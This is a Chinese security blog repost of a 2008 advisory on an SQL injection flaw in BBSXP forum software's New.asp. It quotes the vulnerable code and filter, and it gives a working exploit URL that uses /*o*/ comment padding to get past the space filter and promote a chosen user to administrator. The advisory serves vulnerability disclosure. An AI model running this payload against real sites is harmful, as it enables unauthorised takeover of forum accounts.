BBSXP 2008 New.asp过滤不严导致注入漏洞

    [晴 February 21, 2008 23:40 | by ]
来源:Neeao's Security Blog
BBSXP 2008 New.asp过滤不严导致注入漏洞

漏洞发布:Bug.Center.Team

发布日期:2008-2-18

更新日期:2008-2-21

受影响系统:

BBSXP7.3
BBSXP2008

漏洞文件:

New.asp

代码分析:

Sort=HTMLEncode(Request("Sort")) //第24行

if Sort = empty then
  SqlSort="ThreadID"
else
  SqlSort=Sort
end if
。。。。。。
sql="Select top "&SqlTopicCount&" * from ["&TablePrefix&"Threads] where Visible=1 "&SqlForumID&" "&SqlTimeLimit&" order by "&SqlSort&" desc" //第66行


过滤函数HTMLEncode 在文件BBSXP_Class.asp中:
Function HTMLEncode(fString)
  fString=Replace(fString,CHR(9),"")
  fString=Replace(fString,CHR(13),"")
  fString=Replace(fString,CHR(22),"")
  fString=Replace(fString,CHR(38),"&")  '“&”
  fString=Replace(fString,CHR(32)," ")  '“ ”
  fString=Replace(fString,CHR(34),""")  '“"”
  fString=Replace(fString,CHR(39),"'")  '“'”
  fString=Replace(fString,CHR(42)&CHR(42),"**")  '“**”/**/
  fString=Replace(fString,CHR(44),",")  '“,”
  fString=Replace(fString,CHR(45)&CHR(45),"--")  '“--”
  fString=Replace(fString,CHR(60),"&#60;")  '“<”
  fString=Replace(fString,CHR(62),"&#62;")  '“>”
  fString=Replace(fString,CHR(92),"\")  '“\”
  fString=Replace(fString,CHR(59),"&#59;")  '“;”
  fString=Replace(fString,CHR(10),"<br>")
  fString=ReplaceText(fString,"([&#])([a-z0-9]*)&#59;","$1$2;")

  if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))

  if IsSqlDataBase=0 then '过滤片假名(日文字符)[\u30A0-\u30FF] by yuzi
    fString=escape(fString)
    fString=ReplaceText(fString,"%u30([A-F][0-F])","&#x30$1;")
    fString=unescape(fString)
  end if
  HTMLEncode=fString
End Function

HTMLEncode过滤了Tab键,空格,** .
变量SqlSort过滤不严导致sql注入漏洞的产生。

漏洞测试:

http://localhost/bbsxp/new.asp?Sort=ThreadID/*o*/update/*o*/bbsxp_users/*o*/set/*o*/UserRoleID=1/*o*/where/*o*/Username=0x6C006F00760065006D006D006D00/*o*/select/*o*/*/*o*/from/*o*/BBSXP_users/*o*/order/*o*/by/*o*/userid
成功修改用户名为lovemmm为管理员。(最好使用POST提交呵呵)

关于Bug.Center.Team:
Bug.Center.Team(又名:漏洞预警中心小组)是国内较早成立的以脚本安全为主要方向的网络安全组 织,致力于网络和脚本安全问题的研究,在对于脚本程序的修补、维护、漏洞检测都有专业水平,是国 内最专业、最经验的安全服务组织,有关Bug.Center.Team的详情请参见: http://www.cnbct.org
Bug&Exp | Comments(1) | Trackbacks(0) | Reads(10905)
深思
February 22, 2008 23:19
靠/*o*/这个的方法都想的到。
Pages: 1/1 First page 1 Final page
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive